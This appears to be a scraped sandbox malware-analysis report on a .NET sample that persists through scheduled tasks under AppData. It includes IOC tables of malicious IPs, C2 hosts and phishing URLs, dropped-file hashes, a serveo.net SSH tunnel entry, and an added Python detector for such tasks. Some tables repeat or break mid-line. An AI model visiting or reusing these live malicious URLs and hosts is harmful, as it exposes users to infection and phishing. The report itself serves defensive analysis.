• Excluded IPs from analysis (whitelisted): 20.189.173.22
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 0LpFv1haTA.exe, PID 5948 because it is empty
• Execution Graph export aborted for target 0LpFv1haTA.exe, PID 7388 because it is empty
• Execution Graph export aborted for target manager.exe, PID 2108 because it is empty
• Execution Graph export aborted for target manager.exe, PID 8056 because it is empty
• Execution Graph export aborted for target manager.exe, PID 8128 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Report size getting too big, too many NtSetInformationFile calls found
• Some HTTP raw data packets have been limited to 10 per session; view the PCAPs for the complete data
• VT rate limit hit for: 0LpFv1haTA.exe
Time | Type | Description
17:27:13 | API Interceptor | 6742443x Sleep call for process: 0LpFv1haTA.exe modified
17:27:41 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
17:28:32 | API Interceptor | 2706x Sleep call for process: manager.exe modified
23:27:11 | Task Scheduler | Run new task: 0LpFv1haTA path: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
23:28:09 | Task Scheduler | Run new task: mswindow path: C:\Users\user\AppData\Roaming\XenoManager\manager.exe
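Both Task Scheduler entries above register a task whose action is a binary dropped under the user's AppData tree, which is persistence that needs no administrative rights. The script below is an added example of the check a responder would run against a host's task definitions; it is not Joe Sandbox code and not code from the sample. The task XML is constructed: the task names and command paths are taken from the timeline entries, the triggers are assumed, and the Updater task is a made-up benign control. The element layout follows the Task Scheduler schema Windows stores under C:\Windows\System32\Tasks.

```python
"""Flag scheduled tasks whose action runs a binary from a user-writable
directory, the persistence shape both Task Scheduler entries above show.

Added example for this report; not Joe Sandbox code and not code from the
sample. The task XML is constructed: names and command paths come from the
timeline entries, the triggers are assumed, Updater is a benign control.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to. A task action living here persists
# without admin rights; ProgramData is included because users may create
# subdirectories there by default.
USER_WRITABLE = re.compile(
    r"^(?:%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%"
    r"|[A-Za-z]:\\Users\\[^\\]+\\AppData\\(?:Local|Roaming|LocalLow)\\"
    r"|[A-Za-z]:\\Users\\Public\\"
    r"|[A-Za-z]:\\Windows\\Temp\\"
    r"|[A-Za-z]:\\ProgramData\\)",
    re.IGNORECASE,
)

# Constructed task definitions (see module docstring).
SAMPLE_TASKS = {
    "0LpFv1haTA": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\user\\AppData\\Local\\Starlabs\\0LpFv1haTA.exe</Command></Exec>
  </Actions>
</Task>""",
    "mswindow": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <StartBoundary>2024-09-27T23:28:09</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>"C:\\Users\\user\\AppData\\Roaming\\XenoManager\\manager.exe"</Command></Exec>
  </Actions>
</Task>""",
    "Updater": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger/></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Program Files\\Example\\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>""",
}


def audit_task(name, xml_text):
    """Return one record per Exec action: command, arguments, triggers, verdict."""
    root = ET.fromstring(xml_text)
    triggers_node = root.find("t:Triggers", NS)
    triggers = [] if triggers_node is None else [
        child.tag.split("}", 1)[1] for child in triggers_node
    ]
    records = []
    for exec_node in root.findall("t:Actions/t:Exec", NS):
        # Commands are often quoted in task files; strip the quotes before matching.
        cmd = exec_node.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()
        records.append({
            "task": name,
            "command": cmd,
            "arguments": args,
            "triggers": triggers,
            "user_writable": bool(USER_WRITABLE.match(cmd)),
        })
    return records


def audit_tasks(tasks=SAMPLE_TASKS):
    """Audit a {task name: task XML} mapping and return every action record."""
    out = []
    for name, xml_text in tasks.items():
        out.extend(audit_task(name, xml_text))
    return out


if __name__ == "__main__":
    for rec in audit_tasks():
        flag = "SUSPICIOUS" if rec["user_writable"] else "ok"
        print(f"{flag:<10} {rec['task']:<12} {','.join(rec['triggers']):<14} {rec['command']}")
```

On a live host, read each file under C:\Windows\System32\Tasks as bytes (they are UTF-16 with a BOM, which ET.fromstring handles when given bytes) and pass the file's relative path as the task name; the output of `schtasks /query /xml` can be fed through the same function. Treat a hit as a starting point rather than a verdict: legitimate per-user installers also schedule tasks from AppData, so pair the path check with the trigger list and the binary's signer before acting on it.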
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.80.128.17 | file.exe | malicious | Quasar, WhiteSnake Stealer | 185.80.128.17:8080/mnemonic-verify/3E27098BCD7964327121624127/DE52CA56A9907082C17144162CC28F24
208.95.112.1 | file.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | DHL-AWB#TRACKING907853880911.bat | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Ref_50102_607.7z.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | RTGS-WB-ABS-240730-NEW.lnk | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Payment.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | 17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exe | malicious | Clipboard Hijacker, Quasar | ip-api.com/json/
208.95.112.1 | file.exe | malicious | Quasar, WhiteSnake Stealer | ip-api.com/line?fields=query,country
208.95.112.1 | REQUEST FOR QUOTATION.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | DSR0987678900000.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Proof Of Payment.js | malicious | WSHRAT | ip-api.com/json/
149.154.167.220 | 0225139776.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 
149.154.167.220 | .05.2024.exe | malicious | Snake Keylogger | 
149.154.167.220 | GfGxum1sf3.exe | malicious | Snake Keylogger, VIP Keylogger | 
149.154.167.220 | GfGxum1sf3.exe | malicious | Snake Keylogger, VIP Keylogger | 
149.154.167.220 | 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 
                                                                                                                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                    Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                      VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                          TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| ip-api.com | file.exe | malicious | Blank Grabber | 208.95.112.1 |
| | DHL-AWB#TRACKING907853880911.bat | malicious | AgentTesla | 208.95.112.1 |
| | Ref_50102_607.7z.exe | malicious | AgentTesla | 208.95.112.1 |
| | RTGS-WB-ABS-240730-NEW.lnk | malicious | AgentTesla | 208.95.112.1 |
| | Payment.js | malicious | WSHRAT | 208.95.112.1 |
| | 17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exe | malicious | Clipboard Hijacker, Quasar | 208.95.112.1 |
| | file.exe | malicious | Quasar, WhiteSnake Stealer | 208.95.112.1 |
| | REQUEST FOR QUOTATION.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | 208.95.112.1 |
| | DSR0987678900000.exe | malicious | AgentTesla | 208.95.112.1 |
| | Proof Of Payment.js | malicious | WSHRAT | 208.95.112.1 |
| api.telegram.org | 0225139776.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | .05.2024.exe | malicious | Snake Keylogger | 149.154.167.220 |
| | GfGxum1sf3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | GfGxum1sf3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | VL1xZpPp1I.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220 |
| | z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| serveo.net | http://www.is.gd/g1mDsM/ | malicious | Unknown | 138.68.79.95 |
| | https://58746d458e04134ebabfbf2c1cbaf911.serveo.net/login.html | malicious | Unknown | 138.68.79.95 |
| | MsvL2pjs5Y.exe | malicious | AveMaria, WhiteSnake Stealer | 138.68.79.95 |
| | Services.exe | malicious | XWorm | 138.68.79.95 |
| | gtKVgxrJ22.exe | malicious | Gurcu Stealer, WhiteSnake Stealer | 138.68.79.95 |
| | https://7ebee112efb5cee2bd96ae6a79586ed0.serveo.net | malicious | HTMLPhisher | 138.68.79.95 |
| | https://48227f1df9cc685b88b4cfbd9e51bd84.serveo.net/login.htmlIP: | malicious | Unknown | 138.68.79.95 |
| | http://3f3a19a3465855ddd33fc11ea5dd551f.serveo.net/login.html.php | malicious | Unknown | 138.68.79.95 |
| | http://c9a4070e3e0ce940560dc0400f4bfea7.serveo.net/login.html | malicious | Unknown | 138.68.79.95 |
| | http://3db18079c799501faebad3baadb674e8.serveo.net/login.html | malicious | Unknown | 138.68.79.95 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| TELEGRAMRU | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 149.154.167.99 |
| | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | 149.154.167.99 |
| | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 149.154.167.99 |
| | 0225139776.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | .05.2024.exe | malicious | Snake Keylogger | 149.154.167.220 |
| | GfGxum1sf3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | GfGxum1sf3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| | Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| THEFIRST-ASRU | https://game-repack.site/2024/09/26/bloodborne | malicious | Unknown | 37.230.117.113 |
| | http://www.goo.su/fJu2F/ | malicious | Unknown | 188.120.245.54 |
| | http://vidaliaonion.org | malicious | Unknown | 188.120.245.54 |
| | https://u.to/W9rXIA | malicious | Unknown | 82.146.50.100 |
| | https://u.to/SpzbIA | malicious | Unknown | 82.146.50.100 |
| | http://filesharing-st2.ru | malicious | Unknown | 80.87.195.79 |
| | XPC5PMKegV.exe | malicious | DCRat | 92.63.98.227 |
| | 2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188.120.227.56 |
| | http://ledger-devices-sync.vercel.app/ | malicious | Unknown | 77.246.156.134 |
| | Liquidation.Loader.exe | malicious | DCRat, PureLog Stealer, zgRAT | 212.109.199.34 |
| VPSNET-ASLT | file.exe | malicious | Quasar, WhiteSnake Stealer | 185.80.128.17 |
| | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | 91.211.247.248 |
| | target.dll.dll | malicious | Unknown | 91.211.247.198 |
| | target.dll.dll | malicious | Unknown | 91.211.247.198 |
| | https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA0MzgwJnMyPTY0MzU5MTI4JnMzPUdMQg== | malicious | Phisher | 185.34.52.226 |
| | https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA4OTYzJnMyPTY0MzU5MTI4JnMzPUdMQg== | malicious | Phisher | 185.34.52.226 |
| | https://storage.googleapis.com/fonews/tracking.html#4FnEbI75687mvlz37qyjwgfznov1060BUBAWJDTIXNIQXO135562/9413s20 | malicious | Phisher | 185.80.128.14 |
| | https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA4OTYzJnMyPTY0MzU5MTI4JnMzPUdMQg== | malicious | Phisher | 185.34.52.226 |
| | https://hovi.zocsc.top/ | malicious | Unknown | 185.34.52.192 |
| | https://sacasqr3r3wesdgdzx.blob.core.windows.net/cdaswqrs242asdsasa/mhdihjhjudiuas.html | malicious | Phisher | 185.80.130.135 |
| TUT-ASUS | file.exe | malicious | Blank Grabber | 208.95.112.1 |
| | DHL-AWB#TRACKING907853880911.bat | malicious | AgentTesla | 208.95.112.1 |
| | Ref_50102_607.7z.exe | malicious | AgentTesla | 208.95.112.1 |
| | RTGS-WB-ABS-240730-NEW.lnk | malicious | AgentTesla | 208.95.112.1 |
| | Payment.js | malicious | WSHRAT | |
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            DSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Proof Of Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                            • 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://johnjay.jjay.cuny.edu/phone_directory/redirect.php?profiles=https%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fmmakc.com%2Fblack | Get hash | malicious | HtmlDropper | Browse | 149.154.167.220
 | report_209.pdf | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | Shipping documents 000309498585956000797900.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 149.154.167.220
 | https://www.pineapplehospitality.net/ | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Amadey, BitCoin Miner, SilentXMRMiner | Browse | 149.154.167.220

No context
Process:C:\Windows\System32\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):1.3869849168768467
Encrypted:false
SSDEEP:384:T1oaQv4uZ4V4LSaJ7rW+czuiF3Y4lO85:T1qZG4LSa5/czuiF3Y4lO8
MD5:F5E933C9FBEA0E156B92399D252EBFF6
SHA1:1C38691A93E5C9DF0029FD49EEFE9F4BBDA20B99
SHA-256:D601BAC5C649E6003EB2B54052A1500DEB45C89741BA46504E8EE08BED830471
SHA-512:3FF2FE4009E704E4400DA3B7FFB7107BC5403CDC16CC6863497F4599DEB3E9E95B69D49CF36323E4C4B86C94CB86F036751FB6BD1C9A29C0566122B4A74C22F4
Malicious:true
Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.4.6.0.3.8.2.9.2.1.5.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.4.6.0.3.9.3.3.9.0.1.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.4.8.8.a.7.0.-.e.b.7.c.-.4.2.a.c.-.8.d.d.0.-.e.1.3.3.8.9.b.e.6.d.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.9.4.c.2.6.1.-.8.d.6.3.-.4.c.e.9.-.a.5.7.f.-.2.1.9.3.5.a.4.6.5.3.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.0.L.p.F.v.1.h.a.T.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.4.0.2.1.f.b.5.6.e.8.c.b.7.c.b.0.4.8.9.b.d.c.1.0.9.7.9.d.d.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.c.-.0.0.0.1.-.0.0.1.4.-.0.e.4.e.-.c.9.0.3.2.4.1.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.f.4.d.f.e.5.8.4.8.6.b.0.3.f.9.d.7.6.2.d.7.5.d.f.d.f.5.3.9.e.0.0.0.0.0.0.0.0.!.0.0.0.0.b.8.b.3.6.4.9.d.9.5.9.5.2.4.d.f.2.c.4.e.8.a.9.4.4.3.4.f.c.

Process:C:\Windows\System32\WerFault.exe
File Type:Mini DuMP crash report, 16 streams, Fri Sep 27 21:27:18 2024, 0x1205a4 type
Category:dropped
Size (bytes):932595
Entropy (8bit):3.106901083873908
Encrypted:false
SSDEEP:6144:/WpKl5KcXY3KdlFK1xSNFSK4HT7qdE0Wv3Qq1pBwv:l5KcXY4D6MNwzHT7qQQ
MD5:03BC643F8DF5E65532EC49A0D42695F7
SHA1:6C15E5DCCA6CE1A77F466FACBB79B7983E335098
SHA-256:EF33AE0059DF13A92E26FB38643F8FC9E549F10187503929D384E90B2E1C8CBF
SHA-512:DE4726E0428F6ACBADD989605F72EBBB2DE0F8596A5D0CDBF367741D5600A9930710F3416B5582926FADED827758F7E6AAC595042E3BB462B03F954FA5853F2D
Malicious:false

Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):9062
Entropy (8bit):3.708181067179565
Encrypted:false
SSDEEP:192:R6l7wVeJgMKv6YEhw0sgmfZl2VPprs89bWrlQfrtQTm:R6lXJzKv6YE2/gmfr2VLWrifaK
MD5:6F58D5ED16B2C390B0C9E5969A28EDD5
SHA1:151EB92FA5D8D340E2A033FACCA436DE73A79A06
SHA-256:CCFFB6050D791DBD724C6F43E0B363D1BB710D0A999F02FB9855ECB007D80AEC
SHA-512:A6FABB5A4A3F2B4D60DB570ECA04B4DC337F16979C2D042289E9709BEACD90F7F73A1EF6DB7A8A306CC930CF3901A64F42ABD2AD13C5827CEB278DCE250C1DBC
Malicious:false
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.0.<./.P.i.

Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4829
Entropy (8bit):4.48994469633414
Encrypted:false
SSDEEP:48:cvIwWl8zsfJg771I9EAYXWpW8VYj3Ym8M4J8qHFWEyq8vnq5uPjtz2qd:uIjfBI7+X7VzJToEWq58jd2qd
MD5:61E7A8CD0FE8ACFB2EB0399DE79BB4BA
SHA1:3627C4F623DC92498D3641223F1063D1846A63B3
SHA-256:0BF981786D75DD515BF296AF81EC9DB002FABF29677DC95B33F5D25BB3A8A828
SHA-512:1CFCF656F861015266E2A375D9E5C4F66BA3833B480C094651781BB4BA1A75D586B7278A850300ED45891EC4CDE06995C4FF8447B575DFB06967EAB19D8A3E52
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="519150" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process:C:\Windows\System32\OpenSSH\ssh.exe
File Type:ASCII text, with very long lines (404), with CRLF line terminators
Category:dropped
Size (bytes):406
Entropy (8bit):5.90555968999191
Encrypted:false
SSDEEP:12:TyFqFcWmedrh+bMcBVM5uUkZq0lbUMO9wHWSSlICnoF/:dmgSbMcBVM5A409Kw1SlIQ+/
MD5:EC266D309CBAD86B3E4939F2117DFE39
SHA1:CF12599FBDC167B4C01B518A0BD63D51CD83798B
SHA-256:2F8ECCA5380615BCD1530817933A7EA03D2D4FDC7D6E634829AA54E40413B05D
SHA-512:D2D39D9174F459146DE57C205979E7815829C37EAFD214CDCE88F90A961F04E5468290E530CF31B9B621276A86EB3A071BBF3464962E1A8E44A7478794571BAA
Malicious:false
Preview:serveo.net,138.68.79.95 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7YesKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRcWf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps49LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7dsUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZkK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBURhUb8nZSiPuzj..

Process:C:\Users\user\Desktop\0LpFv1haTA.exe
File Type:CSV text
Category:modified
Size (bytes):847
Entropy (8bit):5.354334472896228
Encrypted:false
SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQEAHKKkKYHKGSI6oPtHTH0
MD5:578A9969E472E71F38254887263D82A4
SHA1:8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D
SHA-256:AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
SHA-512:E55F7150298EF037848826E79EB72AD03D3D75C278D91CF0EA6AE3C04B89D4ABBD7BD2D5EB274715687012B90F51D53056F01CDBF5DDBB602711E66909C8BD87
Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\manager.exe
                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):226
                                                                                                                                                                                            Entropy (8bit):5.360398796477698
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                                                            Process:C:\Users\user\Desktop\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9593944
                                                                                                                                                                                            Entropy (8bit):0.16956859276947892
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:YaHDgOV/hchoS9bFr/l2Z40o6MLKkZPDOxAWP0:YmM8/DS9bF7knxMFb7D
                                                                                                                                                                                            MD5:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                            SHA1:B8B3649D959524DF2C4E8A94434FC0DE90F95005
                                                                                                                                                                                            SHA-256:91CFD0498B16D33890D8D4F4F1B69DAAAD5D703F898F46B811F73E92BE19E5FF
